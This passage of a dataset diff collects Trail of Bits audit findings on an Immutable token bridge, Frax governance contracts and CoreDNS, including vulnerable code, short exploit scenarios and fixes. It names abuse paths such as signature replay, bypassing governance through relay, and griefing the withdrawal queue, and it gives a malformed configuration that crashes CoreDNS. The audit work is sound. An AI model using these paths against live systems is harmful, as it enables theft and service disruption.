bucket.refillRate = refillRate; } Figure 2.3: The function sets the system parameters to limit withdrawals of a specic token. ( RootERC20PredicateFlowRate.sol and FlowRateDetection.sol ) However, because the _setFlowRateThreshold function of the FlowRateDetection contract is missing upper bounds on the input parameters, these values could be set to an incorrect or very high value. This could potentially allow users to withdraw large amounts of tokens at once, without triggering the withdrawal queue. Exploit Scenario Alice attempts to update the withdrawalDelay state variable from 24 to 48 hours. However, she mistakenly sets the variable to 0 . Eve uses this setting to skip the withdrawal queue and immediately withdraws her assets. Recommendations Short term, determine reasonable lower and upper bounds for the setWithdrawalDelay and setRateControlThreshold functions, and add the necessary validation to those functions. Long term, carefully document which system parameters are congurable and ensure they have adequate upper and lower bound checks.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. RootERC20Predicate is incompatible with nonstandard ERC-20 tokens ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "The deposit and depositTo functions of the RootERC20Predicate contract are incompatible with nonstandard ERC-20 tokens, such as tokens that take a fee on transfer. The RootERC20Predicate contract allows users to deposit arbitrary tokens into the root chain of the bridge and mint the corresponding token on the child chain of the bridge. Users can deposit their tokens by approving the bridge for the required amount and then calling the deposit or depositTo function of the contract. These functions will call the internal _depositERC20 function, which will perform a check to ensure the token balance of the contract is exactly equal to the balance of the contract before the deposit, plus the amount of tokens that are being deposited. function _depositERC20 (IERC20Metadata rootToken, address receiver , uint256 amount ) private { uint256 expectedBalance = rootToken.balanceOf( address ( this )) + amount; _deposit(rootToken, receiver, amount); // invariant check to ensure that the root token balance has increased by the amount deposited // slither-disable-next-line incorrect-equality require ((rootToken.balanceOf( address ( this )) == expectedBalance), \"RootERC20Predicate: UNEXPECTED_BALANCE\" ); } Figure 3.1: Internal function used to deposit ERC-20 tokens to the bridge ( RootERC20Predicate.sol ) However, some nonstandard ERC-20 tokens will take a percentage of the transferred amount as a fee. Due to this, the require statement highlighted in gure 3.1 will always fail, preventing users from depositing such tokens. Recommendations Short term, clearly document that nonstandard ERC-20 tokens are not supported by the protocol. If the team determines that they want to support nonstandard ERC-20 implementations, additional logic should be added into the _deposit function to determine the actual token amount received by the contract. In this case, reentrancy protection may be needed to mitigate the risks of ERC-777 and similar tokens that implement callbacks whenever tokens are sent or received. Long term, be aware of the idiosyncrasies of ERC-20 implementations. This standard has a history of misuses and issues. References Incident with non-standard ERC20 deationary tokens d-xo/weird-erc20", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Low" + ] + }, + { + "title": "4. Lack of event generation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "Multiple critical operations do not emit events. This creates uncertainty among users interacting with the system. The setRateControlThresholds function in the RootERC20PredicateFlowRate contract does not emit an event when it updates the largeTransferThresholds critical storage variable for a token (gure 4.1). However, having an event emitted to reect such a change in the critical storage variable may allow other system and o-chain components to detect suspicious behavior in the system. Events generated during contract execution aid in monitoring, baselining behavior, and detecting suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside the baseline conditions, and malfunctioning contracts and attacks could go undetected. function setRateControlThreshold ( 1 address token , 2 uint256 capacity , 3 uint256 refillRate , 4 5 uint256 largeTransferThreshold 6 ) external onlyRole(RATE_CONTROL_ROLE) { 7 8 9 } _setFlowRateThreshold(token, capacity, refillRate); largeTransferThresholds[token] = largeTransferThreshold; Figure 4.1: The setRateControlThreshold function ( RootERC20PredicateFlowRate.sol #L214-L222 ) In addition to the above function, the following function should also emit events: The setAllowedZone function in seaport/contracts/ImmutableSeaport.sol Recommendations Short term, add events for all functions that change state to aid in better monitoring and alerting. Long term, ensure that all state-changing operations are always accompanied by events. In addition, use static analysis tools such as Slither to help prevent such issues in the future.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "5. Withdrawal queue can be forcibly activated to hinder bridge operation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-immutable-securityreview.pdf", + "body": "The withdrawal queue can be forcibly activated to impede the proper operation of the bridge. The RootERC20PredicateFlowRate contract implements a withdrawal queue to more easily detect and stop large withdrawals from passing through the bridge (e.g., bridging illegitimate funds from an exploit). A transaction can enter the withdrawal queue in four ways: 1. If a tokens ow rate has not been congured by the rate control admin 2. If the withdrawal amount is larger than or equal to the large transfer threshold for that token 3. If, during a predened period, the total withdrawals of that token are larger than the dened token capacity 4. If the rate controller manually activates the withdrawal queue by using the activateWithdrawalQueue function In cases 3 and 4 above, the withdrawal queue becomes active for all tokens, not just the individual transfers. Once the withdrawal queue is active, all withdrawals from the bridge must wait a specied time before the withdrawal can be nalized. As a result, a malicious actor could withdraw a large amount of tokens to forcibly activate the withdrawal queue and hinder the expected operation of the bridge. Exploit Scenario 1 Eve observes Alice initiating a transfer to bridge her tokens back to the mainnet. Eve also initiates a transfer, or a series of transfers to avoid exceeding the per-transaction limit, of sucient tokens to exceed the expected ow rate. With Alice unaware she is being targeted for grieng, Eve can execute her withdrawal on the root chain rst, cause Alices withdrawal to be pushed into the withdrawal queue, and activate the queue for every other bridge user. Exploit Scenario 2 Mallory has identied an exploit on the child chain or in the bridge itself, but because of the withdrawal queue, it is not feasible to exltrate the funds quickly enough without risking getting caught. Mallory identies tokens with small ow rate limits relative to their price and repeatedly triggers the withdrawal queue for the bridge, degrading the user experience until Immutable disables the withdrawal queue. Mallory takes advantage of this window of time to carry out her exploit, bridge the funds, and move them into a mixer. Recommendations Short term, explore the feasibility of withdrawal queues on a per-token basis instead of having only a global queue. Be aware that if the ow rates are set low enough, an attacker could feasibly use them to grief all bridge users. Long term, develop processes for regularly reviewing the conguration of the various token buckets. Fluctuating token values may unexpectedly make this type of grieng more feasible. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "1. Race condition in FraxGovernorOmega target validation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The FraxGovernorOmega contract is intended for carrying out day-to-day operations and less sensitive proposals that do not adjust system governance parameters. Proposals directly aecting system governance are managed in the FraxGovernorAlpha contract, which has a much higher quorum requirement (40%, compared with FraxGovernorOmega s 4% quorum requirement). When a new proposal is submitted to the FraxGovernorOmega contract through the propose or addTransaction function, the target address of the proposal is checked to prevent proposals from interacting with sensitive functions in allowlisted safes outside of the higher quorum ow (gure 1.1). However, if a proposal to allowlist a new safe is pending in FraxGovernorAlpha , and another proposal that interacts with the pending safe is preemptively submitted through FraxGovernorOmega.propose , the proposal would pass this check, as the new safe would not yet have been added to the allowlist. /// @notice The ```propose``` function is similar to OpenZeppelin's ```propose()``` with minor changes /// @dev Changes include: Forbidding targets that are allowlisted Gnosis Safes /// @return proposalId Proposal ID function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } Figure 1.1: The target validation logic in the FraxGovernorOmega contracts propose function This issue provides a short window of time in which a proposal to update governance parameters that is submitted through FraxGovernorOmega could pass with the contracts 4% quorum, rather than needing to go through FraxGovernorAlpha and its 40% quorum, as intended. Such an exploit would also require cooperation from the safe owners to execute the approved transaction. As the vast majority of operations in the FraxGovernorOmega process will be optimistic proposals, the community may not monitor the contract as comprehensively as FraxGovernorAlpha , and a minority group of coordinated veFXS holders could take advantage of this loophole. Exploit Scenario A FraxGovernorAlpha proposal to add a new Gnosis Safe to the allowlist is being voted on. In anticipation of the proposals approval, the new safe owner prepares and signs a transaction on this new safe for a contentious or previously vetoed action. Alice, a veFXS holder, uses FraxGovernorOmega.propose to initiate a proposal to approve the hash of this transaction in the new safe. Alice coordinates with enough other interested veFXS holders to reach the required quorum on the proposal. The proposal passes, and the new safe owner is able to update governance parameters without the consensus of the community. Recommendations Short term, add additional validation to the end of the proposal lifecycle to detect whether the target has become an allowlisted safe. Long term, when designing new functionality, consider how this type of time-of-check to time-of-use mismatch could aect the system.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: High" + ] + }, + { + "title": "2. Vulnerable project dependency ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "Although dependency scans did not uncover a direct threat to the project codebase, npm audit identied a dependency with a known vulnerability, the yaml library. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a signicant eect on the project system as a whole. The output detailing the identied issue is provided below: Dependency Version ID", + "labels": [ + "Trail of Bits", + "Severity: Undetermined", + "Difficulty: High" + ] + }, + { + "title": "3. Replay protection missing in castVoteWithReasonAndParamsBySig ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The castVoteWithReasonAndParamsBySig function does not include a voter nonce, so transactions involving the function can be replayed by anyone. Votes can be cast through signatures by encoding the vote counts in the params argument. function castVoteWithReasonAndParamsBySig ( uint256 proposalId , uint8 support , string calldata reason, bytes memory params, uint8 v , bytes32 r , bytes32 s ) public virtual override returns ( uint256 ) { address voter = ECDSA.recover( _hashTypedDataV4( keccak256 ( abi.encode( EXTENDED_BALLOT_TYPEHASH, proposalId, support, keccak256 ( bytes (reason)), keccak256 (params) ) ) ), v, r, s ); return _castVote(proposalId, voter, support, reason, params); } Figure 3.1: The castVoteWithReasonAndParamsBySig function does not include a nonce. ( Governor.sol#L508-L535 ) The castVoteWithReasonAndParamsBySig function calls the _countVoteFractional function in the GovernorCountingFractional contract, which keeps track of partial votes. Unlike _countVoteNominal , _countVoteFractional can be called multiple times, as long as the voters total voting weight is not exceeded. Exploit Scenario Alice has 100,000 voting power. She signs a message, and a relayer calls castVoteWithReasonAndParamsBySig to vote for one yes and one abstain. Eve sees this transaction on-chain and replays it for the remainder of Alices voting power, casting votes that Alice did not intend to. Recommendations Short term, either include a voter nonce for replay protection or modify the _countVoteFractional function to require that _proposalVotersWeightCast[proposalId][account] equals 0 , which would allow votes to be cast only once. Long term, increase the test coverage to include cases of signature replay.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "4. Ability to lock any users tokens using deposit_for ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The deposit_for function can be used to lock anyone's tokens given sucient token approvals and an existing lock. @external @nonreentrant ( 'lock' ) def deposit_for (_addr: address, _value: uint256): \"\"\" @notice Deposit `_value` tokens for `_addr` and add to the lock @dev Anyone (even a smart contract) can deposit for someone else, but cannot extend their locktime and deposit for a brand new user @param _addr User's wallet address @param _value Amount to add to user's lock \"\"\" _locked: LockedBalance = self .locked[_addr] assert _value > 0 # dev: need non-zero value assert _locked.amount > 0 , \"No existing lock found\" assert _locked.end > block.timestamp, \"Cannot add to expired lock. Withdraw\" self ._deposit_for(_addr, _value, 0 , self .locked[_addr], DEPOSIT_FOR_TYPE) Figure 4.1: The deposit_for function can be used to lock anyones tokens. ( test/veFXS.vy#L458-L474 ) The same issue is present in the veCRV contract for the CRV token, so it may be known or intentional. Exploit Scenario Alice gives unlimited FXS token approval to the veFXS contract. Alice wants to lock 1 FXS for 4 years. Bob sees that Alice has 100,000 FXS and locks all of the tokens for her. Alice is no longer able to access her 100,000 FXS. Recommendations Short term, make users aware of the issue in the existing token contract. Only present the user with exact approval limits when locking FXS.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "5. The relay function can be used to call critical safe functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The relay function of the FraxGovernorOmega contract supports arbitrary calls to arbitrary targets and can be leveraged in a proposal to call sensitive functions on the Gnosis Safe. function relay ( address target , uint256 value , bytes calldata data) external payable virtual onlyGovernance { ( bool success , bytes memory returndata) = target.call{value: value}(data); Address.verifyCallResult(success, returndata, \"Governor: relay reverted without message\" ); } Figure 5.1: The relay function inherited from Governor.sol The FraxGovernorOmega contract checks proposed transactions to ensure they do not target critical functions on the Gnosis Safe contract outside of the more restrictive FraxGovernorAlpha ow. function propose ( address [] memory targets, uint256 [] memory values, bytes [] memory calldatas, string memory description ) public override returns ( uint256 proposalId ) { _requireSenderAboveProposalThreshold(); for ( uint256 i = 0 ; i < targets.length; ++i) { address target = targets[i]; // Disallow allowlisted safes because Omega would be able to call safe.approveHash() outside of the // addTransaction() / execute() / rejectTransaction() flow if ($safeRequiredSignatures[target] != 0 ) { revert IFraxGovernorOmega.DisallowedTarget(target); } } proposalId = _propose({ targets: targets, values: values, calldatas: calldatas, description: description }); } Figure 5.2: The propose function of FraxGovernorOmega.sol A malicious user can hide a call to the Gnosis Safe by wrapping it in a call to the relay function. There are no further restrictions on the target contract argument, which means the relay function can be called with calldata that targets the Gnosis Safe contract. Exploit Scenario Alice, a veFXS holder, submits a transaction to the propose function. The targets array contains the FraxGovernorOmega address, and the corresponding calldatas array contains an encoded call to its relay function. The encoded call to the relay function has a target address of an allowlisted Gnosis Safe and an encoded call to its approveHash function with a payload of a malicious transaction hash. Due to the low quorum threshold on FraxGovernorOmega and the shorter voting period, Alice is able to push her malicious transaction through, and it is approved by the safe even though it should not have been. Recommendations Short term, add a check to the relay function that prevents it from targeting addresses of allowlisted safes. Long term, carefully examine all cases of user-provided inputs, especially where arbitrary targets and calldata can be submitted, and expand the unit tests to account for edge cases specic to the wider system.", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "6. Votes can be delegated to contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "Votes can be delegated to smart contracts. This behavior contrasts with the fact that FXS tokens can be locked only in whitelisted contracts. Allowing votes to be delegated to smart contracts could lead to unexpected behavior. By default, smart contracts are unable to gain voting power; to gain voting power, they need to be explicitly whitelisted by the Frax Finance team in the veFXS contract. @internal def assert_not_contract (addr: address): \"\"\" @notice Check if the call is from a whitelisted smart contract, revert if not @param addr Address to be checked \"\"\" if addr != tx.origin: checker: address = self .smart_wallet_checker if checker != ZERO_ADDRESS: if SmartWalletChecker(checker).check(addr): return raise \"Smart contract depositors not allowed\" Figure 6.1: The contract check in veFXS.vy This is the intended design of the voting escrow contract, as allowing smart contracts to vote would enable wrapped tokens and bribes. The VeFxsVotingDelegation contract enables users to delegate their voting power to other addresses, but it does not contain a check for smart contracts. This means that smart contracts can now hold voting power, and the team is unable to disallow this. function _delegate ( address delegator , address delegatee ) internal { // Revert if delegating to self with address(0), should be address(delegator) if (delegatee == address ( 0 )) revert IVeFxsVotingDelegation.IncorrectSelfDelegation(); IVeFxsVotingDelegation.Delegation memory previousDelegation = $delegations[delegator]; // This ensures that checkpoints take effect at the next epoch uint256 checkpointTimestamp = (( block.timestamp / 1 days) * 1 days) + 1 days; IVeFxsVotingDelegation.NormalizedVeFxsLockInfo memory normalizedDelegatorVeFxsLockInfo = _getNormalizedVeFxsLockInfo({ delegator: delegator, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerFromPreviousDelegate({ previousDelegation: previousDelegation, checkpointTimestamp: checkpointTimestamp }); _moveVotingPowerToNewDelegate({ newDelegate: delegatee, delegatorVeFxsLockInfo: normalizedDelegatorVeFxsLockInfo, checkpointTimestamp: checkpointTimestamp }); // ... } Figure 6.2: The _delegate function in VeFxsVotingDelegation.sol Exploit Scenario Eve sets up a contract that accepts delegated votes in exchange for rewards. The contract ends up owning a majority of the FXS voting power. Recommendations Short term, consider whether smart contracts should be allowed to hold voting power. If so, document this fact; if not, add a check to the VeFxsVotingDelegation contract to ensure that addresses receiving delegated voting power are not smart contracts . Long term, when implementing new features, consider the implications of adding them to ensure that they do not lift constraints that were placed beforehand.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "7. Lack of public documentation regarding voting power expiry ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "The user documentation concerning the calculation of voting power is unclear. The Frax-Governance specication sheet provided by the Frax Finance team states, Voting power goes to 0 at veFXS lock expiration time, this is dierent from veFXS.getBalance() which will return the locked amount of FXS after the lock has expired. This statement is in line with the codes behavior. The _calculateVotingWeight function in the VeFxsVotingDelegation contract does not return the locked veFXS balance once a lock has expired. /// @notice The ```_calculateVotingWeight``` function calculates ```account```'s voting weight. Is 0 if they ever delegated and the delegation is in effect. /// @param voter Address of voter /// @param timestamp A block.timestamp, typically corresponding to a proposal snapshot /// @return votingWeight Voting weight corresponding to ```account```'s veFXS balance function _calculateVotingWeight ( address voter , uint256 timestamp ) internal view returns ( uint256 ) { // If lock is expired they have no voting weight if (VE_FXS.locked(voter).end <= timestamp) return 0 ; uint256 firstDelegationTimestamp = $delegations[voter].firstDelegationTimestamp; // Never delegated OR this timestamp is before the first delegation by account if (firstDelegationTimestamp == 0 || timestamp < firstDelegationTimestamp) { try VE_FXS.balanceOf({ addr: voter, _t: timestamp }) returns ( uint256 _balance ) { return _balance; } catch {} } return 0 ; } Figure 7.2: The function that calculates the voting weight in VeFxsVotingDelegation.sol If a voters lock has expired or was never created, the short-circuit condition returns zero voting power. This behavior contrasts with the veFxs.balanceOf function, which would return the users last locked FXS balance. @external @view def balanceOf (addr: address, _t: uint256 = block.timestamp) -> uint256: \"\"\" @notice Get the current voting power for `msg.sender` @dev Adheres to the ERC20 `balanceOf` interface for Aragon compatibility @param addr User wallet address @param _t Epoch time to return voting power at @return User voting power \"\"\" _epoch: uint256 = self .user_point_epoch[addr] if _epoch == 0 : return 0 else : last_point: Point = self .user_point_history[addr][_epoch] last_point.bias -= last_point.slope * convert(_t - last_point.ts, int128) if last_point.bias < 0 : last_point.bias = 0 unweighted_supply: uint256 = convert(last_point.bias, uint256) # Original from veCRV weighted_supply: uint256 = last_point.fxs_amt + (VOTE_WEIGHT_MULTIPLIER * unweighted_supply) return weighted_supply Figure 7.1: The balanceOf function in veFXS.vy This divergence should be clearly documented in the code and should be reected in Frax Finances public-facing documentation, which does not mention the fact that an expired lock does not hold any voting power: Each veFXS has 1 vote in governance proposals. Staking 1 FXS for the maximum time, 4 years, would generate 4 veFXS. This veFXS balance itself will slowly decay down to 1 veFXS after 4 years, [...]. Exploit Scenario Alice buys FXS to be able to vote on a proposal. She is not aware that she is required to create a lock (even if expired) to have any voting power at all. She is unable to vote for the proposal. Recommendations Short term, modify the VeFxsVotingDelegation contract to reect the desired voting power curve and/or document whether this is intended behavior. Long term, make sure to keep public-facing documentation up to date when changes are made.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "8. Spamming risk in propose functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-fraxgov-securityreview.pdf", + "body": "Anyone with enough veFXS tokens to meet the proposal threshold can submit an unbounded number of proposals to both the FraxGovernorAlpha and FraxGovernorOmega contracts. The only requirement for submitting proposals is that the msg.sender address must have a balance of veFXS tokens larger than the _proposalThreshold value. Once that requirement is met, a user can submit as many proposals as they would like. A large volume of proposals may create diculties for o-chain monitoring solutions and user-interface interactions. function _requireSenderAboveProposalThreshold() internal view { if (_getVotes(msg.sender, block.timestamp - 1, \"\") < proposalThreshold()) { revert SenderVotingWeightBelowProposalThreshold(); } } Figure 8.1: The _requireSenderAboveProposalThreshold function, called by the propose function ( FraxGovernorBase.sol#L104-L108 ) Exploit Scenario Mallory has 100,000 voting power. She submits one million proposals with small but unique changes to the description eld of each one. The system saves one million unique proposals and emits one million ProposalCreated events. Front-end components and o-chain monitoring systems are spammed with large quantities of data. Recommendations Short term, track and limit the number of proposals a user can have active at any given time. Long term, consider cases of user interactions beyond just the intended use cases for potential malicious behavior. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "1. Risk of a race condition in the secondary plugins setup function ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "When it fails to transfer a zone from another server, the setup function of the secondary plugin prints a message to standard output. It obtains the name of the zone, stored in the variable n , from a loop and prints the message in an anonymous inner goroutine. However, the variable is not copied before being used in the anonymous goroutine, and the value that n points to is likely to change by the time the scheduler executes the goroutine. Consequently, the value of n will be inaccurate when it is printed. 19 24 26 27 29 30 31 32 35 36 40 func setup(c *caddy.Controller) error { // (...). for _, n := range zones.Names { // (...) c.OnStartup( func () error { z.StartupOnce.Do( func () { go func () { // (...) for { // (...) log.Warningf( \"All '%s' masters failed to transfer, retrying in %s: %s\" , n , dur.String(), err) // (...) 41 46 47 48 49 50 51 52 53 } } } z.Update() }() }) return nil }) Figure 1.1: The value of n is not copied before it is used in the anonymous goroutine and could be logged incorrectly. ( plugin/secondary/setup.go#L19-L53 ) Exploit Scenario An operator of a CoreDNS server enables the secondary plugin. The operator sees an error in the standard output indicating that the zone transfer failed. However, the error points to an invalid zone, making it more dicult for the operator to troubleshoot and x the issue. Recommendations Short term, create a copy of n before it is used in the anonymous goroutine. See Appendix B for a proof of concept demonstrating this issue and an example of the x. Long term, integrate anonymous-race-condition Semgrep rule into the CI/CD pipeline to catch this type of race condition.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Undetermined" + ] + }, + { + "title": "2. Upstream errors captured in the grpc plugin are not returned ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "In the ServeDNS implementation of the grpc plugin, upstream errors are captured in a loop. However, once an error is captured in the upstreamErr variable, the function exits with a nil error; this is because there is no break statement forcing the function to exit the loop and to reach a return statement, at which point it would return the error value. The ServeDNS function of the forward plugin includes a similar but correct implementation. func (g *GRPC) ServeDNS(ctx context.Context, w dns.ResponseWriter, r *dns.Msg) ( int , error ) { // (...) upstreamErr = err // Check if the reply is correct; if not return FormErr. if !state.Match(ret) { debug.Hexdumpf(ret, \"Wrong reply for id: %d, %s %d\" , ret.Id, state.QName(), state.QType()) formerr := new (dns.Msg) formerr.SetRcode(state.Req, dns.RcodeFormatError) w.WriteMsg(formerr) return 0 , nil } w.WriteMsg(ret) return 0 , nil } if upstreamErr != nil { return dns.RcodeServerFailure, upstreamErr } Figure 2.1: plugin/secondary/setup.go#L19-L53 Exploit Scenario An operator runs CoreDNS with the grpc plugin. Upstream errors cause the gRPC functionality to fail. However, because the errors are not logged, the operator remains unaware of their root cause and has diculty troubleshooting and remediating the issue. Recommendations Short term, correct the ineectual assignment to ensure that errors captured by the plugin are returned. Long term, integrate ineffassign into the CI/CD pipeline to catch this and similar issues.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Undetermined" + ] + }, + { + "title": "3. Index-out-of-range panic in autopath plugin initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "The following syntax is used to congure the autopath plugin: autopath [ZONE...] RESOLV-CONF The RESOLV-CONF parameter can point to a resolv.conf(5) conguration le or to another plugin, if the string in the resolv variable is prexed with an @ symbol (e.g., @kubernetes). However, the autoPathParse function does not ensure that the length of the RESOLV-CONF parameter is greater than zero before dereferencing its rst element and comparing it with the @ character. func autoPathParse(c *caddy.Controller) (*AutoPath, string , error ) { ap := &AutoPath{} mw := \"\" for c.Next() { zoneAndresolv := c.RemainingArgs() if len (zoneAndresolv) < 1 { return ap, \"\" , fmt.Errorf( \"no resolv-conf specified\" ) } resolv := zoneAndresolv[ len (zoneAndresolv)- 1 ] if resolv[ 0 ] == '@' { mw = resolv[ 1 :] Figure 3.1: The length of resolv may be zero when the rst element is checked. ( plugin/autopath/setup.go#L45-L54 ) Specifying a conguration le with a zero-length RESOLV-CONF parameter, as shown in gure 3.2, would cause CoreDNS to panic. 0 autopath \"\" Figure 3.2: An autopath conguration with a zero-length RESOLV-CONF parameter panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/autopath.autoPathParse(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:53 +0x35c github.com/coredns/coredns/plugin/autopath.setup(0xc000518870) /home/ubuntu/audit-coredns/client-code/coredns/plugin/autopath/setup.go:16 +0x33 github.com/coredns/caddy.executeDirectives(0xc00029eb00, {0x7ffdc770671b, 0x8}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000543260, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc0003e8a00}, 0xc0003e8a00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc0003e8a00}, 0xc00029eb00, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc0003e8a00}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 3.3: CoreDNS panics when loading the autopath conguration. Exploit Scenario An operator of a CoreDNS server provides an empty RESOLV-CONF parameter when conguring the autopath plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the resolv variable is a non-empty string before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe denial of service (DoS).", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Undetermined" + ] + }, + { + "title": "4. Index-out-of-range panic in forward plugin initialization ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", + "body": "Initializing the forward plugin involves parsing the relevant conguration section. func parseStanza(c *caddy.Controller) (*Forward, error ) { f := New() if !c.Args(&f.from) { return f, c.ArgErr() } origFrom := f.from zones := plugin.Host(f.from).NormalizeExact() f.from = zones[ 0 ] // there can only be one here, won't work with non-octet reverse Figure 4.1: The length of the zones variable may be zero when the rst element is checked. ( plugin/forward/setup.go#L89-L97 ) An invalid conguration le for the forward plugin could cause the zones variable to have a length of zero. A Base64-encoded example of such a conguration le is shown in gure 4.2. Lgpmb3J3YXJkIE5vTWF0Pk69VL0vvVN0ZXJhbENoYXJDbGFzc0FueUNoYXJOb3ROTEEniez6bnlDaGFyQmVnaW5MaW5l RW5kTGluZUJlZ2luVGV4dEVuZFRleHRXb3JkQm91bmRhcnlOb1dvYXRpbmcgc3lzdGVtIDogImV4dCIsICJ4ZnMiLCAi bnRTaW50NjRLaW5kZnMiLiB5IGluZmVycmVkIHRvIGJlIGV4dCBpZiB1bnNwZWNpZmllZCBlIDogaHR0cHM6Di9rdWJl cm5ldGVzaW9kb2NzY29uY2VwdHNzdG9yYWdldm9sdW1lcyMgIiIiIiIiIiIiIiIiJyCFmIWlsZj//4WuhZilr4WY5bCR mPCd Figure 4.2: The Base64-encoded forward conguration le Specifying a conguration le like that shown above would cause CoreDNS to panic when attempting to access the rst element of zones : panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/forward.parseStanza(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:97 +0x972 github.com/coredns/coredns/plugin/forward.parseForward(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:81 +0x5e github.com/coredns/coredns/plugin/forward.setup(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:22 +0x33 github.com/coredns/caddy.executeDirectives(0xc0000ea800, {0x7ffdf9f6e6ed, 0x36}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc00056a860, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc00024ea80}, 0xc00024ea80, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc00024ea80}, 0xc0000ea800, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc00024ea80}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 4.3: CoreDNS panics when loading the forward conguration. Exploit Scenario An operator of a CoreDNS server miscongures the forward plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is dicult for the operator to troubleshoot and x the issue. Recommendations Short term, verify that the zones variable has the correct number of elements before indexing it. 